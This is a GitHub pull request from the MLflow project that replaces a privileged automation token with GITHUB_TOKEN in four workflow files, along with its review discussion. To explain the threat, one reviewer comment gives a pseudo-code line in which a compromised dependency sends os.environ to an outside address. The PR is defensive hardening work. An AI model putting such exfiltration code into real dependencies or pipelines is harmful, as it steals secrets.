### PR TITLE
Minimize the use of `MLFLOW_AUTOMATION_TOKEN`

### PR DESCRIPTION
**Pull request by harupy**
## Related Issues/PRs

 #xxx

## What changes are proposed in this pull request?

Minimize the use of `MLFLOW_AUTOMATION_TOKEN` to enhance security.

## How is this patch tested?

- [x] Existing unit/integration tests
- [ ] New unit/integration tests
- [ ] Manual tests (describe details, including test results, below)

## Does this PR require documentation update?

- [ ] No. You can skip the rest of this section.
- [ ] Yes. I've updated:
  - [ ] Examples
  - [ ] API references
  - [ ] Instructions

### Is this a user-facing change?

- [ ] No. You can skip the rest of this section.
- [ ] Yes. Give a description of this change to be included in the release notes for MLflow users.

(Details in 1-2 sentences. You can just refer to another PR with a description if this PR is part of a larger change.)

### What component(s), interfaces, languages, and integrations does this PR affect?

Components

- [ ] `area/artifacts`: Artifact stores and artifact logging
- [ ] `area/build`: Build and test infrastructure for MLflow
- [ ] `area/docs`: MLflow documentation pages
- [ ] `area/examples`: Example code
- [ ] `area/gateway`: AI Gateway service, Gateway client APIs, third-party Gateway integrations
- [ ] `area/model-registry`: Model Registry service, APIs, and the fluent client calls for Model Registry
- [ ] `area/models`: MLmodel format, model serialization/deserialization, flavors
- [ ] `area/recipes`: Recipes, Recipe APIs, Recipe configs, Recipe Templates
- [ ] `area/projects`: MLproject format, project running backends
- [ ] `area/scoring`: MLflow Model server, model deployment tools, Spark UDFs
- [ ] `area/server-infra`: MLflow Tracking server backend
- [ ] `area/tracking`: Tracking Service, tracking client APIs, autologging

Interface

- [ ] `area/uiux`: Front-end, user experience, plotting, JavaScript, JavaScript dev server
- [ ] `area/docker`: Docker use across MLflow's components, such as MLflow Projects and MLflow Models
- [ ] `area/sqlalchemy`: Use of SQLAlchemy in the Tracking Service or Model Registry
- [ ] `area/windows`: Windows support

Language

- [ ] `language/r`: R APIs and clients
- [ ] `language/java`: Java APIs and clients
- [ ] `language/new`: Proposals for new client languages

Integrations

- [ ] `integrations/azure`: Azure and Azure ML integrations
- [ ] `integrations/sagemaker`: SageMaker integrations
- [ ] `integrations/databricks`: Databricks integrations

<a name="release-note-category"></a>

### How should the PR be classified in the release notes? Choose one:

- [ ] `rn/breaking-change` - The PR will be mentioned in the "Breaking Changes" section
- [x] `rn/none` - No description will be included. The PR will be mentioned only by the PR number in the "Small Bugfixes and Documentation Updates" section
- [ ] `rn/feature` - A new user-facing feature worth mentioning in the release notes
- [ ] `rn/bug-fix` - A user-facing bug fix worth mentioning in the release notes
- [ ] `rn/documentation` - A user-facing documentation change worth mentioning in the release notes

### CODE REVIEW

File: .github/workflows/cancel.yml [hunk 1]
```diff
@@ -14,7 +14,7 @@ jobs:
       - uses: actions/checkout@v3
       - uses: actions/github-script@v6
         with:
-          github-token: ${{ secrets.MLFLOW_AUTOMATION_TOKEN }}
+          github-token: ${{ secrets.GITHUB_TOKEN }}
```
Comment (harupy) [inline .github/workflows/cancel.yml:17]: I'm not sure if this really works. If it doesn't, I'll revert.

File: .github/workflows/rerun.yml [hunk 2]
```diff
@@ -19,7 +19,7 @@ jobs:
       - uses: actions/checkout@v3
       - uses: actions/github-script@v6
         with:
-          github-token: ${{ secrets.MLFLOW_AUTOMATION_TOKEN }}
+          github-token: ${{ secrets.GITHUB_TOKEN }}
```
Comment (harupy) [inline .github/workflows/rerun.yml:22]: same here: https://github.com/mlflow/mlflow/pull/9562/files#r1319401032

File: .github/workflows/preview-docs.yml [hunk 3]
```diff
@@ -15,7 +15,7 @@ jobs:
           pip install requests
       - name: Create preview link
         env:
-          GITHUB_TOKEN: ${{ secrets.MLFLOW_AUTOMATION_TOKEN }}
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
```
Comment (harupy) [inline .github/workflows/preview-docs.yml:18]: I think this works.

File: .github/workflows/stale.yml [hunk 4]
```diff
@@ -11,7 +11,7 @@ jobs:
     steps:
       - uses: harupy/stale@mlflow-stale-bot
         with:
-          repo-token: ${{ secrets.MLFLOW_AUTOMATION_TOKEN }}
+          repo-token: ${{ secrets.GITHUB_TOKEN }}
```
Comment (harupy) [inline .github/workflows/stale.yml:14]: I think this works.

File: .github/workflows/cancel.yml (hunk 1 above)
Comment (serena-ruan) [reply .github/workflows/cancel.yml:17]: What's the security problem of using MLFLOW_AUTOMATION_TOKEN?

Comment (harupy) [reply .github/workflows/cancel.yml:17]: For example, `.github/workflows/preview-docs.yml` uses `requests`. If one of its dependencies is compromised and contains code like this:

```
send_to(os.environ, "harupy@gmail.com")
```

Comment (harupy) [reply .github/workflows/cancel.yml:17]: The best way to protect a secret is never use it.

**Review by serena-ruan — APPROVED** [review]
LGTM!

**Pull request merged**